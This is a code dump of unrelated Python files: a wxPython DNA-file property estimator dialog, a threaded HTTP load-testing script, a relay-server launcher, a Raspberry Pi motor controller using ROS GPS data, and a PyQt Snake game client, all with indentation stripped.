self.hBox3.Add(self.butCancel, 1, wx.LEFT , border = 5)
self.vBox.Add(self.hBox3,flag = wx.ALIGN_CENTER_HORIZONTAL | wx.TOP | wx.BOTTOM, border = 10)
self.SetSizerAndFit(self.vBox)
elif "linux" in sys.platform:
head = wx.StaticText(self ,label = "Estimate properties",style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 5)
line1 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBox = wx.BoxSizer(wx.HORIZONTAL)
self.butChoose = wx.Button(self , label = "Choose File")
self.hBox.Add(self.butChoose,flag = wx.LEFT | wx.RIGHT | wx.ALIGN_CENTER_VERTICAL , border = 10,proportion = 1)
path = wx.StaticText(self, label = "Select a DNA File from your File System",style = wx.ALIGN_CENTER_VERTICAL)
self.hBox.Add(path,flag = wx.ALIGN_CENTER_VERTICAL,proportion = 2)
self.vBox.Add(self.hBox)
self.hBox1 = wx.BoxSizer(wx.HORIZONTAL)
text1 = wx.StaticText(self, label = " Enter Na+ salt concentration (mM) :",style = wx.ALIGN_CENTER)
self.saltText = wx.TextCtrl(self,name = "Salt Concentration",size = (200,30))
self.hBox1.Add(text1)
self.hBox1.Add(self.saltText)
self.vBox.Add(self.hBox1,flag = wx.TOP | wx.BOTTOM , border = 5)
self.hBox2 = wx.BoxSizer(wx.HORIZONTAL)
text1 = wx.StaticText(self, label = " Enter base pair cost ($) :\t\t\t",style = wx.ALIGN_CENTER)
self.priceText = wx.TextCtrl(self,name = "Price",size = (200,30))
self.hBox2.Add(text1)
self.hBox2.Add(self.priceText)
self.vBox.Add(self.hBox2,flag = wx.TOP | wx.BOTTOM , border = 5)
line2 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line2, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 15)
self.txt = wx.TextCtrl(self,name = "hBox",size = (200,250),style= wx.TE_READONLY | wx.TE_MULTILINE)
self.vBox.Add(self.txt,flag = wx.EXPAND | wx.ALL , border = 10)
head = wx.StaticText(self ,label = "Disclaimer:This values are just an approximation and the actual values may vary",style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT |wx.ALIGN_CENTER_HORIZONTAL | wx.RIGHT, border = 10)
line2 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line2, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 15)
self.hBox3 = wx.BoxSizer(wx.HORIZONTAL)
self.butCalc = wx.Button(self , label = "Calculate")
self.butCancel = wx.Button(self, label = "Close")
self.butSave = wx.Button(self , label = "Save")
self.hBox3.Add(self.butCalc,proportion = 1)
self.hBox3.Add(self.butSave,proportion = 1)
self.hBox3.Add(self.butCancel,proportion = 1)
self.vBox.Add(self.hBox3,flag = wx.ALIGN_CENTER_HORIZONTAL | wx.TOP | wx.BOTTOM, border = 5)
self.SetSizer(self.vBox)
self.SetSize((500,580))
elif "darwin" in sys.platform:
head = wx.StaticText(self ,label = "Estimate properties",style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(16, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 8)
line1 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBox = wx.BoxSizer(wx.HORIZONTAL)
self.butChoose = wx.Button(self , label = "Choose File")
self.hBox.Add(self.butChoose,flag = wx.LEFT | wx.RIGHT | wx.ALIGN_CENTER_VERTICAL , border = 10,proportion = 1)
path = wx.StaticText(self, label = "Select a DNA File from your File System",style = wx.ALIGN_CENTER_VERTICAL)
self.hBox.Add(path,flag = wx.ALIGN_CENTER_VERTICAL,proportion = 2)
self.vBox.Add(self.hBox)
self.hBox1 = wx.BoxSizer(wx.HORIZONTAL)
text1 = wx.StaticText(self, label = " Enter Na+ salt concentration (mM) :\t",style = wx.ALIGN_CENTER)
self.saltText = wx.TextCtrl(self,name = "Salt Concentration",size = (200,25))
self.hBox1.Add(text1)
self.hBox1.Add(self.saltText)
self.vBox.Add(self.hBox1,flag = wx.TOP | wx.BOTTOM , border = 8)
self.hBox2 = wx.BoxSizer(wx.HORIZONTAL)
text1 = wx.StaticText(self, label = " Enter base pair cost ($) :\t\t\t\t",style = wx.ALIGN_CENTER)
self.priceText = wx.TextCtrl(self,name = "Price",size = (200,25))
self.hBox2.Add(text1)
self.hBox2.Add(self.priceText)
self.vBox.Add(self.hBox2,flag = wx.TOP | wx.BOTTOM , border = 8)
line2 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line2, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 15)
self.txt = wx.TextCtrl(self,name = "hBox",size = (200,250),style= wx.TE_READONLY | wx.TE_MULTILINE)
self.vBox.Add(self.txt,flag = wx.EXPAND | wx.ALL , border = 10)
head = wx.StaticText(self ,label = "Disclaimer:This values are just an approximation and the actual values may vary",style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(12, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT |wx.ALIGN_CENTER_HORIZONTAL | wx.RIGHT, border = 10)
line2 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line2, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 15)
self.hBox3 = wx.BoxSizer(wx.HORIZONTAL)
self.butCalc = wx.Button(self , label = "Calculate")
self.butCancel = wx.Button(self, label = "Close")
self.butSave = wx.Button(self , label = "Save")
self.hBox3.Add(self.butCalc,proportion = 1, flag = wx.LEFT | wx.RIGHT , border = 5)
self.hBox3.Add(self.butSave,proportion = 1, flag = wx.LEFT | wx.RIGHT , border = 5)
self.hBox3.Add(self.butCancel,proportion = 1, flag = wx.LEFT | wx.RIGHT , border = 5)
self.vBox.Add(self.hBox3,flag = wx.ALIGN_CENTER_HORIZONTAL | wx.TOP | wx.BOTTOM, border = 5)
self.SetSizer(self.vBox)
self.SetSize((500,580))
self.butChoose.Bind(wx.EVT_BUTTON,self.onChoose)
self.butCancel.Bind(wx.EVT_BUTTON,self.onCancel)
self.butCalc.Bind(wx.EVT_BUTTON,self.calc)
self.butSave.Bind(wx.EVT_BUTTON,self.onSave)
self.butSave.Disable()
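# Save stays disabled until a calculation has produced details to write out.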
self.path = None
def onChoose(self,e):
self.butSave.Disable()
self.txt.Clear()
self.priceText.Clear()
self.saltText.Clear()
fileSelector = wx.FileDialog(self, message="Choose a file",defaultFile="",style=wx.OPEN | wx.MULTIPLE | wx.CHANGE_DIR )
if fileSelector.ShowModal() == wx.ID_OK:
paths = fileSelector.GetPaths()
self.path = unicodedata.normalize('NFKD', paths[0]).encode('ascii','ignore')
self.txt.WriteText("#File Selected : " + self.path)
fileSelector.Destroy()
def calc(self,e):
self.txt.Clear()
if self.path is not None:
if not self.saltText.IsEmpty() and not self.priceText.IsEmpty() and FILE_EXT in self.path:
"""
tempTuple = extraModules.getGCContent(self.path)
noOfGCPairs = tempTuple[0]; self.minGC = (tempTuple[1] * 100)/OLIGO_SIZE; self.maxGC = (tempTuple[2] * 100)/OLIGO_SIZE
print tempTuple[0] , tempTuple[1] , tempTuple[2]
totalPairs = os.path.getsize(PATH + "/../.temp/dnaString.txt")
self.GCContent = (noOfGCPairs * 100)/totalPairs
self.totalCost = int(self.priceText.GetString(0,self.priceText.GetLastPosition())) * totalPairs
naContent = int(self.saltText.GetString(0,self.saltText.GetLastPosition()))
self.minMeltingPoint = (81.5 + 16.6 * math.log10(naContent) + 0.41 * (self.minGC) - 600)/OLIGO_SIZE
self.maxMeltingPoint = (81.5 + 16.6 * math.log10(naContent) + 0.41 * (self.maxGC) - 600)/OLIGO_SIZE
self.details = "#Details for the DNA :\n\n- GC Content(% in DNA String):\t\t\t" + `self.GCContent` + "\n- Total Cost($ of DNA String):\t\t\t" + `self.totalCost` + "\n- Min Melting Point(℃/nucleotide):\t" + str(self.minMeltingPoint) + "\n- Max Melting Point(℃/nucleotide):\t" + str(self.maxMeltingPoint)
"""
con = sqlite3.connect(PATH + '/../database/prefs.db')
with con:
cur = con.cursor()
WORKSPACE_PATH = cur.execute('SELECT * FROM prefs WHERE id = 8').fetchone()[1]
if "linux" in sys.platform:
WORKSPACE_PATH = unicodedata.normalize('NFKD', WORKSPACE_PATH).encode('ascii','ignore')
if not os.path.isdir(WORKSPACE_PATH + '/.temp'):
os.mkdir(WORKSPACE_PATH + '/.temp')
try:
float(self.saltText.GetString(0,self.saltText.GetLastPosition()))
float(self.priceText.GetString(0,self.priceText.GetLastPosition()))
except ValueError:
wx.MessageDialog(self,'Please enter numbers, not letters', 'Error',wx.OK | wx.ICON_ERROR | wx.STAY_ON_TOP).ShowModal()
return
self.naContent = float(self.saltText.GetString(0,self.saltText.GetLastPosition()))
self.costPerBase = float(self.priceText.GetString(0,self.priceText.GetLastPosition()))
if 'darwin' in sys.platform:
p = threading.Thread(name = "GC Content Grabber", target = extraModules.getGCContent, args = (self.path,self.costPerBase,self.naContent,))
else:
p = multiprocessing.Process(target = extraModules.getGCContent , args = (self.path,self.costPerBase,self.naContent,) , name = "Checking Details Process")
p.start()
temp = wx.ProgressDialog('Please wait...','Analysing the String....This may take a while....' ,parent = self,style = wx.PD_APP_MODAL | wx.PD_CAN_ABORT | wx.PD_ELAPSED_TIME)
terminated = False
temp.SetSize((450,180))
if 'darwin' in sys.platform:
while p.isAlive():
time.sleep(0.1)
if not temp.UpdatePulse("Encoding the File....This may take several minutes...\n\tso sit back and relax.....")[0]:
wx.MessageDialog(self,'Cannot be stopped.Sorry', 'Information!',wx.OK | wx.ICON_INFORMATION | wx.STAY_ON_TOP).ShowModal()
temp.Destroy()
if not p.isAlive():
p.join()
else:
while len(multiprocessing.active_children()) != 0:
time.sleep(0.1)
if not temp.UpdatePulse("Analysing the File....This may take several minutes...\n\tso sit back and relax.....")[0]:
p.terminate()
terminated = True
break
p.join()
temp.Destroy()
p.terminate()
if not terminated:
tempFile = open(WORKSPACE_PATH + "/.temp/details.txt","rb")
self.details = tempFile.read()
self.txt.WriteText(self.details)
tempFile.close()
self.butSave.Enable()
else:
wx.MessageDialog(self,'Make sure you filled in the required details and selected a .dnac file', 'Error',wx.OK | wx.ICON_ERROR | wx.STAY_ON_TOP).ShowModal()
else:
wx.MessageDialog(self,'Make sure you selected a .dnac file', 'Error',wx.OK | wx.ICON_ERROR | wx.STAY_ON_TOP).ShowModal()
def onSave(self,e):
con = sqlite3.connect(PATH + '/../database/prefs.db')
with con:
cur = con.cursor()
WORKSPACE_PATH = cur.execute('SELECT * FROM prefs WHERE id = 8').fetchone()[1]
if "linux" in sys.platform:
WORKSPACE_PATH = unicodedata.normalize('NFKD', WORKSPACE_PATH).encode('ascii','ignore')
if not os.path.isdir(WORKSPACE_PATH + '/.temp'):
os.mkdir(WORKSPACE_PATH +'/.temp')
## if string == 'None':
## locationSelector = wx.FileDialog(self,"Please select location to save your details",style = wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT)
## if locationSelector.ShowModal() == wx.ID_OK:
## paths = locationSelector.GetPath()
## self.savePath = paths
##
## propFile = file(self.savePath + ".txt","w")
## propFile.write("#Input Details:-\n\n- Salt Concentration :\t\t" + str(self.naContent) + "\n- Cost per Base :\t\t" + str(self.costPerBase) + "\n\n" + self.details)
## #propFile.write("\n\n\n © 2013 - GUPTA RESEARCH LABS - Generated by DNA-CLOUD")
##
## wx.MessageDialog(self,'Details written to file', 'Info',wx.OK | wx.ICON_INFORMATION | wx.STAY_ON_TOP).ShowModal()
## else:
## locationSelector.Destroy()
## del locationSelector
xtime = datetime.now().timetuple()
self.savePath = WORKSPACE_PATH + "/details_encodedFile_" + `xtime[2]` + "_" + `xtime[1]` + "_" + `xtime[0]`
propFile = file(self.savePath + ".txt","w")
propFile.write("#Input Details:-\n\n- Salt Concentration :\t\t" + str(self.naContent) + "\n- Cost per Base :\t\t" + str(self.costPerBase) + "\n\n" + self.details)
wx.MessageDialog(self,'Details written to file', 'Info',wx.OK | wx.ICON_INFORMATION | wx.STAY_ON_TOP).ShowModal()
def onCancel(self,e):
self.Destroy()
|
load_test.py
|
# coding:utf-8
import time
import urllib2
import threading
from Queue import Queue
from time import sleep
import sys
# Performance test page
#PERF_TEST_URL = "http://10.2.66.38/?yyid=-1&suv=1309231700203264&callback=xxxxx"
URLS = [line.strip() for line in open("urls", "r") if line.strip()]
# Config: stress test
THREAD_NUM = 10 # total number of concurrent threads
ONE_WORKER_NUM = 500 # number of iterations per thread
LOOP_SLEEP = 0.01 # delay between requests (seconds)
# Config: simulated normal-load run
#THREAD_NUM = 10 # total number of concurrent threads
#ONE_WORKER_NUM = 10 # number of iterations per thread
#LOOP_SLEEP = 0 # delay between requests (seconds)
# Error count
ERROR_NUM = 0
# Worker function that issues a single request
def doWork(index, url):
t = threading.currentThread()
#print "["+t.name+" "+str(index)+"] "+PERF_TEST_URL
try:
html = urllib2.urlopen(url).read()
except urllib2.URLError, e:
print "["+t.name+" "+str(index)+"] "
print e
global ERROR_NUM
ERROR_NUM += 1
# Worker thread body: issues ONE_WORKER_NUM requests in a loop
def working():
t = threading.currentThread()
print "["+t.name+"] Sub Thread Begin"
i = 0
while i < ONE_WORKER_NUM:
i += 1
doWork(i, URLS[i % len(URLS)])
sleep(LOOP_SLEEP)
print "["+t.name+"] Sub Thread End"
def main():
#doWork(0)
#return
t1 = time.time()
Threads = []
# create the worker threads
for i in range(THREAD_NUM):
t = threading.Thread(target=working, name="T"+str(i))
t.setDaemon(True)
Threads.append(t)
for t in Threads:
t.start()
for t in Threads:
t.join()
print "main thread end"
t2 = time.time()
print "========================================"
#print "URL:", PERF_TEST_URL
print "任务数量:", THREAD_NUM, "*", ONE_WORKER_NUM, "=", THREAD_NUM*ONE_WORKER_NUM
print "总耗时(秒):", t2-t1
print "每次请求耗时(秒):", (t2-t1) / (THREAD_NUM*ONE_WORKER_NUM)
print "每秒承载请求数:", 1 / ((t2-t1) / (THREAD_NUM*ONE_WORKER_NUM))
print "错误数量:", ERROR_NUM
if __name__ == "__main__":
main()
|
__main__.py
|
import time
import threading
import traceback
import argparse
import logging
from . import appserver, controlserver
parser = argparse.ArgumentParser(description="Run a Vibrance relay server "
"(command server and client WebSocket "
"servers).")
parser.add_argument("--psk", help="Optional password for the command server.")
parser.add_argument("--cert", help="SSL certificate for securing the "
"WebSockets and the command server.")
parser.add_argument("--key", help="SSL private key for securing the WebSockets"
" and the command server.")
log_levels = {"DEBUG": logging.DEBUG, "INFO": logging.INFO,
"WARNING": logging.WARNING, "ERROR": logging.ERROR,
"CRITICAL": logging.CRITICAL}
parser.add_argument("--debug", help=f"Debug level {log_levels.keys()}",
default="CRITICAL", choices=log_levels.keys())
args = parser.parse_args()
logging.basicConfig(level=log_levels[args.debug])
def wrapLoop(loopfunc):
"""Wraps a thread in a wrapper function to restart it if it exits."""
def wrapped():
while True:
try:
loopfunc()
except BaseException:
print(f"Exception in thread {loopfunc},"
" restarting in 10s...")
traceback.print_exc()
else:
print(f"Thread {loopfunc} exited, restarting in 10s...")
time.sleep(10)
return wrapped
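# wrapLoop returns a zero-argument callable suitable as a Thread target, so each server loop below is restarted automatically if it raises or returns.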
appServer = appserver.AppServer(args.cert, args.key)
controlServer = controlserver.ControlServer(appServer, args.psk,
args.cert, args.key)
appServerThread = threading.Thread(target=wrapLoop(appServer.run))
controlServerThread = threading.Thread(target=wrapLoop(controlServer.run))
appCheckAliveThread = threading.Thread(
target=wrapLoop(appServer.handleCheckAlive))
appServerThread.start()
controlServerThread.start()
appCheckAliveThread.start()
while True:
time.sleep(1)
|
Motor.py
|
#######################################################
# LOVE_DEATH_ROBOTS #
#######################################################
import RPi.GPIO as GPIO
import time
import threading
import roslibpy
# setTargetHeading (imported here as Haversine) computes the target heading between the base station and the rover from their GPS coordinates
from Haversine import setTargetHeading as Haversine
client = roslibpy.Ros(host='192.168.1.2', port=9090)
#tells the program what ROS topic it should be listening to
listener = roslibpy.Topic(client, '/gnss','fake_sensor_test/gps')
#topic carrying the base-station IMU heading as a string
listener2 = roslibpy.Topic(client, '/baseIMU','std_msgs/String')
# a function to begin listening and subscribe to the topic listed above
def start_listening():
listener.subscribe(receive_message)
def start_listening2():
listener2.subscribe(receive_message2)
#prints out the message and sets variables (both receive_message functions)
def receive_message(message):
print("start receive message")
global roverLat, roverLon, baseLon, baseLat
print(message['roverLat'],message['roverLon'])
roverLat = message['roverLat']
roverLon = message['roverLon']
baseLon = message['baseLon']
baseLat = message['baseLat']
print ("end receive message")
def receive_message2(message):
global data
data = message['data']
#runs the motor
def main():
GPIO.setmode(GPIO.BCM)
# these are the pins in use and MUST BE USED to control the motor on the base station
control_pins = [4,17,11]
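# From the usage below, GPIO 4 appears to select the rotation direction and GPIO 11 carries the step pulses; GPIO 17 is configured but never toggled here.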
# sets up the pins for the raspberry pi
for pin in control_pins:
GPIO.setup(pin, GPIO.OUT)
GPIO.output(pin, 0)
timestamp = time.time()
#Target = Have.setTargetHeading((lat1,lon1), (x,y))
Have = Haversine((baseLat, baseLon), (roverLat,roverLon))
# if the target heading is greater than the current IMU heading, rotate in one direction
if (Have > float(data)):
GPIO.output(4,1)
# The while loop allows a tolerance of +/- 5 degrees around the IMU heading to prevent constant movement
while(int(Have) not in range(int(float(data) - 5),int(float(data) + 5))):
for x in range(30):
GPIO.output(11,1)
time.sleep(.00005)
GPIO.output(11,0)
time.sleep(.00005)
# otherwise the target heading is lower than or equal to the current IMU heading, so rotate the other way
else:
GPIO.output(4,0)
# The while loop allows a tolerance of +/- 5 degrees around the IMU heading to prevent constant movement
while(int(Have) not in range(int(float(data) - 5), int(float(data) + 5))):
for x in range(30):
GPIO.output(11,1)
time.sleep(.00005)
GPIO.output(11,0)
time.sleep(.00005)
# Initialize variables
data = baseLat = roverLat = baseLon = roverLon = 0
# compute an initial heading from the placeholder coordinates; main() recomputes it once real GPS data arrives
Have = Haversine((baseLat,baseLon), (roverLat,roverLon))
client.run()
# starts listening and returning values
client.on_ready(start_listening)
# register the second subscription once the connection is ready
client.on_ready(start_listening2)
#thread to run main while rosbridge collect data
threading.Thread(target=main).start()
GPIO.cleanup()
|
game.py
|
import engine_revised
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from PyQt5.QtMultimedia import *
import sys
from client import Client
from threading import Thread
import protobuffer_pb2 as game
from time import sleep
selectedColor = QtGui.QColor(255, 85, 255)
userName = str
class Mainwindow(QMainWindow):
def __init__(self, name):
super(Mainwindow, self).__init__()
self.name = name
self.setupUi(self)
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(1050, 750)
self.board = Board(self)
self.setCentralWidget(self.board)
self.board.setObjectName("board")
self.board.start()
self.scoreboard = QtWidgets.QTextEdit(self.board)
self.scoreboard.setGeometry(QtCore.QRect(10, 10, 200, 300))
self.scoreboard.setFont(QFont("Arial", 12))
self.scoreboard.setStyleSheet("background: rgba(247, 247, 247, .5); color: black")
self.scoreboard.setObjectName("scoreboard")
self.scoreboard.setEnabled(False)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setStyleSheet("background: rgb(240, 240, 240)")
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.soundeffect = QSoundEffect(MainWindow)
self.soundeffect.setSource(QUrl.fromLocalFile("gamemusic.wav"))
self.soundeffect.setVolume(0.25)
self.soundeffect.setObjectName("soundeffect")
self.soundeffect.setLoopCount(100)
self.radioButton = QtWidgets.QRadioButton(self.board)
self.radioButton.setObjectName("radioButton")
self.radioButton.setGeometry(QtCore.QRect(10, 650, 61, 20))
self.radioButton.toggled.connect(lambda:self.btnstate(self.radioButton))
self.radioButton.setChecked(False)
self.label = QLabel(MainWindow)
self.label.setObjectName("label")
self.label.setGeometry(QRect(140, -47, 201, 200))
self.label.setStyleSheet("font: 20pt \"8514oem\";")
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def btnstate(self, radioButton):
if radioButton.isChecked() == True:
self.soundeffect.play()
else:
self.soundeffect.stop()
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "Snok"))
self.scoreboard.setHtml(_translate("MainWindow", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'MS Shell Dlg 2\'; font-size:7.8pt; font-weight:400; font-style:normal;\">\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p></body></html>"))
self.statusbar.showMessage(_translate("statusbar", self.name))
self.radioButton.setText(_translate("MainWindow", "Music"))
self.statusbar.setStyleSheet(_translate("Statusbar", "Font: 10pt"))
class Ui_Form(QWidget):
def __init__(self, parent):
super(Ui_Form, self).__init__(parent)
self.parent = parent
self.setupUi(self)
def setupUi(self, QWidget):
QWidget.setObjectName("Widget")
QWidget.resize(346, 268)
QWidget.setGeometry(350,100,346,268)
self.quitButton = QtWidgets.QPushButton(QWidget)
self.quitButton.setObjectName("quitButton")
self.quitButton.setGeometry(QRect(0, 170, 110, 28))
self.quitButton.setStyleSheet("background:rgb(255, 85, 0)")
self.quitButton.clicked.connect(self.quitGame)
self.playButton = QtWidgets.QPushButton(QWidget)
self.playButton.setObjectName("playButton")
self.playButton.setGeometry(QRect(116, 170, 110, 28))
self.playButton.setStyleSheet("background:rgb(85, 170, 255)")
self.playButton.clicked.connect(self.playAgain)
self.scoreButton = QtWidgets.QPushButton(QWidget)
self.scoreButton.setObjectName("scoreButton")
self.scoreButton.setGeometry(QRect(232, 170, 110, 28))
self.scoreButton.setStyleSheet("background:rgb(245, 252, 36)")
self.scoreButton.clicked.connect(self.showScores)
self.quitButton.setCursor(QCursor(Qt.PointingHandCursor))
self.playButton.setCursor(QCursor(Qt.PointingHandCursor))
self.scoreButton.setCursor(QCursor(Qt.PointingHandCursor))
self.gameOver = QtWidgets.QLabel(QWidget)
self.gameOver.setObjectName("gameOver")
self.gameOver.setGeometry(QRect(120, 30, 201, 61))
self.gameOver.setStyleSheet("font: 12pt \"8514oem\";")
self.label = QtWidgets.QLabel(QWidget)
self.label.setObjectName("label")
self.label.setGeometry(QRect(100, 90, 201, 41))
self.label.setStyleSheet("font: 12pt \"8514oem\";")
self.retranslateUi(QWidget)
QMetaObject.connectSlotsByName(QWidget)
def quitGame(self):
QApplication.instance().quit()
def playAgain(self):
self.parent.start()
self.close()
def showScores(self):
self.highscore = HighScoreWidget()
self.highscore.show()
def retranslateUi(self, QWidget):
_translate = QtCore.QCoreApplication.translate
QWidget.setWindowTitle(_translate("Widget", "Game Over!"))
self.quitButton.setText(_translate("Widget", "Quit"))
self.playButton.setText(_translate("Widget", "Play Again"))
self.scoreButton.setText(_translate("Widget", "Show Highscores"))
self.gameOver.setText(_translate("Widget", "GAME OVER"))
self.label.setText(_translate("Widget", "Final Score : "+final_score))
class Board(QFrame):
snok_score =[]
def __init__(self, parent):
super(Board, self).__init__(parent)
self.WIDTHINBLOCKS = 105
self.HEIGHTINBLOCKS = 75
self.SPEED = 17
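# Timer interval in milliseconds (roughly 60 board updates per second).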
self.parent = parent
self.screen_width = int(self.parent.width())
self.screen_height = int(self.parent.height())
self.setFocusPolicy(Qt.StrongFocus)
self.engine = engine_revised.Engine()
self.client = Client(userName, self.engine)
self.client.send_action("w")
self.timer = QBasicTimer()
self.direction = "w"
self.food = []
self.board = []
self.snakes_score = []
self.data = game.Data()
self.data.alive = False
self.data_thread = Thread(target=self.game_data_loop, daemon=True)
self.data_thread.start()
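# Block until the first server update marks this snake as alive, so the board has data before the first paint.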
while not self.data.alive:
sleep(0.5)
def game_data_loop(self):
while True:
self.data = self.client.gotten_data.get()
def rec_width(self):
return self.contentsRect().width() / self.WIDTHINBLOCKS
def rec_height(self):
return self.contentsRect().height() / self.HEIGHTINBLOCKS
def start(self):
self.timer.start(self.SPEED, self)
if not self.data_thread.is_alive():
self.data_thread.start()
self.client.send_action("w")
self.data.alive = False
while not self.data.alive:
sleep(0.5)
def paintEvent(self, event):
painter = QPainter(self)
rect = self.contentsRect()
global selectedColor
boardtop = rect.bottom() - self.HEIGHTINBLOCKS * self.rec_height()
#data = self.client.gotten_data.get()
#self.data.snakes[:]
mini_data = game.Data()
mini_data.snakes.extend(self.data.snakes)
mini_data.foods.extend(self.data.foods)
mini_data.walls.extend(self.data.walls)
self.items = self.engine.get_items_on_screen(userName, mini_data, self.WIDTHINBLOCKS, self.HEIGHTINBLOCKS)
#print('Getting moves: ', self.items)
for item in self.items:
if item.skin == '@':
self.draw_square(painter,rect.left() + item.x * self.rec_width(), boardtop + item.y * self.rec_height(), selectedColor)
elif item.skin == 'O':
self.draw_square(painter, rect.left() + item.x * self.rec_width(), boardtop + item.y * self.rec_height(), selectedColor)
elif item.skin == 'A':
color = QColor(255, 0, 0)
self.draw_square(painter, rect.left() + item.x * self.rec_width(), boardtop + item.y * self.rec_height(),color )
elif item.skin == '%':
color = QColor(255, 214, 0)
self.draw_square(painter, rect.left() + item.x * self.rec_width(), boardtop + item.y * self.rec_height() ,color )
elif item.skin == '#':
color = QColor(0, 0, 0)
self.draw_square(painter, rect.left() + item.x * self.rec_width(), boardtop + item.y * self.rec_height() ,color )
#Other Snake
elif item.skin == '¤':
color = QColor(0, 0, 255)
self.draw_square(painter, rect.left() + item.x * self.rec_width(), boardtop + item.y * self.rec_height() ,color )
elif item.skin == '§':
color = QColor(0, 0, 139)
self.draw_square(painter, rect.left() + item.x * self.rec_width(), boardtop + item.y * self.rec_height() ,color )
def draw_square(self, painter, x, y, QColor):
painter.fillRect(int(x) , int(y) , int(self.rec_width()) -2 , int(self.rec_height()) -2 , QColor)
def timerEvent(self, event):
if event.timerId() == self.timer.timerId():
scores = []
for snake in self.data.snakes:
scores.append((snake.id, snake.score))
if userName == snake.id:
global final_score
final_score = str(snake.score)
scores.sort(key=lambda x : x[1], reverse=True)
score_string = ""
for i, (id, score) in enumerate(scores):
if i == 20:
break
score_string += f"{id}: {score}\n"
self.parent.scoreboard.setPlainText(score_string)
if not self.data.alive:
self.gameover()
self.timer.stop()
self.update()
def gameover(self):
self.gameoverWidget = Ui_Form(self)
self.gameoverWidget.show()
def keyPressEvent(self, event):
key = event.key()
if key == Qt.Key_W or key == Qt.Key_Up:
self.client.send_action("w")
self.direction = 'w'
print('you pressed w')
if key == Qt.Key_A or key == Qt.Key_Left:
self.client.send_action("a")
self.direction = 'a'
print("you pressed a")
if key == Qt.Key_D or key == Qt.Key_Right:
self.client.send_action("d")
self.direction = 'd'
print("you pressed d")
if key == Qt.Key_S or key == Qt.Key_Down:
self.client.send_action("s")
self.direction = 's'
print("you pressed s")
class HighScoreWidget(QWidget):
def __init__(self, ):
super(HighScoreWidget, self).__init__()
self.setUp(self)
def setUp(self, Widget):
Widget.setObjectName("Widget")
Widget.resize(600, 500)
Widget.setStyleSheet("background: rgb(255,255,224)")
self.titlelabel = QtWidgets.QLabel(Widget)
self.titlelabel.setObjectName("title")
self.titlelabel.setGeometry(QtCore.QRect(230, 20, 150, 20))
self.titlelabel.setStyleSheet("Font: 15pt")
self.top = QtWidgets.QLabel(Widget)
self.top.setObjectName("top")
self.top.setGeometry(QtCore.QRect(250, 70, 150, 25))
self.top.setStyleSheet("Font: 12pt")
self.scoreboard = QtWidgets.QTextEdit(Widget)
self.scoreboard.setEnabled(False)
self.scoreboard.setGeometry(QtCore.QRect(160, 120, 250, 300))
self.scoreboard.setFont(QFont("Arial", 12))
self.scoreboard.setStyleSheet("background: rgba(247, 247, 247, .5); color: black")
self.scoreboard.setObjectName("scoreboard")
self.engine = engine_revised.Engine()
self.client = Client(userName, self.engine)
self.scorelist = self.client.get_high_scores()
stringscore = ''
for highscore in self.scorelist.scores:
stringscore += (str(highscore.id)+' : '+str(highscore.score)+ '\n')
self.scoreboard.setPlainText(stringscore)
self.retranslateUi(Widget)
QtCore.QMetaObject.connectSlotsByName(Widget)
def retranslateUi(self, Widget):
_translate = QtCore.QCoreApplication.translate
Widget.setWindowTitle(_translate("Widget", "Highscore"))
self.titlelabel.setText(_translate("Widget", "Leaderboard"))
self.top.setText(_translate("Widget", "Top 10"))
class LoginDialog(QDialog):
def __init__(self):
super().__init__()
self.setupUi(self)
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(540, 200)
Dialog.setStyleSheet("background: rgb(172, 172, 172)")
self.userLabel = QtWidgets.QLabel(Dialog)
self.userLabel.setGeometry(QtCore.QRect(10, 20, 241, 22))
self.userLabel.setObjectName("enter_nickname")
self.userLabel.setStyleSheet("Font: 8pt")
self.pick = QtWidgets.QLabel(Dialog)
